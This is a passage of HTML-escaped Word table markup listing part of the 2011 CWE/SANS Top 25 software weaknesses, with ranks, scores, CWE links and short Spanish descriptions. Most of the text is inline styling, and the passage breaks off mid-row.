mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-352&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span lang="EN-US" style="font-size: 10.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Cross-Site   Request Forgery (CSRF)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 13;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[13]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;69.3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-22"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-22&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No limitar el acceso al sistema de ficheros   a directorios restringidos&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 14;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[14]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;68.5&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-494"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-494&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Descarga de código sin chequear la   integridad del mismo&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 15;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[15]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;67.8&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-863"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-863&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Autorización incorrecta&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 16;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[16]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;66.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-829"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-829&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Permitir la integración de funcionalidades   de fuentes no confiables&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 17;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[17]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;65.5&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-732"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-732&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Asignación de permisos incorrecta a recursos   críticos&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 18;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[18]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;64.6&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-676"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-676&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Uso de funciones potencialmente peligrosas&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 19;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[19]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;64.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-327"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-327&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;User un algoritmo de cifrado que ha sido   comprometido o roto&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 20;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[20]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;62.4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-131"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-131&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Cálculo incorrecto del tamaño de memoria&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 21;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[21]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;61.5&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-307"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-307&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;No restricción a un número de intentos   fallidos de acceso&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 22;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[22]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;61.1&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-601"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-601&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Redirección URL a sitios no confiables   (‘Open Redirect’)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 23;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[23]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;61.0&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a href="http://cwe.mitre.org/top25/?2011#CWE-134"&gt;&lt;span style="color: #376092; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;CWE-134&lt;/span&gt;&lt;/a&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 76.28%;" width="76%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;Formato de cadena no controlado&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;  &lt;/tr&gt;
&lt;tr style="mso-yfti-irow: 24;"&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.12%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;strong&gt;&lt;span style="font-family: &amp;quot;Calibri&amp;quot;,&amp;quot;sans-serif&amp;quot;; font-size: 10.0pt; mso-ascii-theme-font: minor-latin; mso-bidi-theme-font: minor-latin; mso-hansi-theme-font: minor-latin;"&gt;[24]&lt;/span&gt;&lt;/strong&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 3.28%;" width="3%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin;"&gt;60.3&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;/td&gt;   &lt;td style="padding: 1.5pt 1.5pt 1.5pt 1.5pt; width: 16.4%;" width="16%"&gt;   &lt;div class="MsoNormal"&gt;&lt;span style="color: #376092; font-size: 10.0pt; mso-bidi-font-family: Calibri; mso-bidi-theme-font: minor-latin; mso-style-textfill-fill-alpha: 100.0%; mso-style-textfill-fill-color: #376092; mso-style-textfill-fill-colortransforms: lumm=75000; mso-style-textfill-fill-themecolor: accent1; mso-themecolor: accent1; mso-themeshade: 191;"&gt;&lt;a 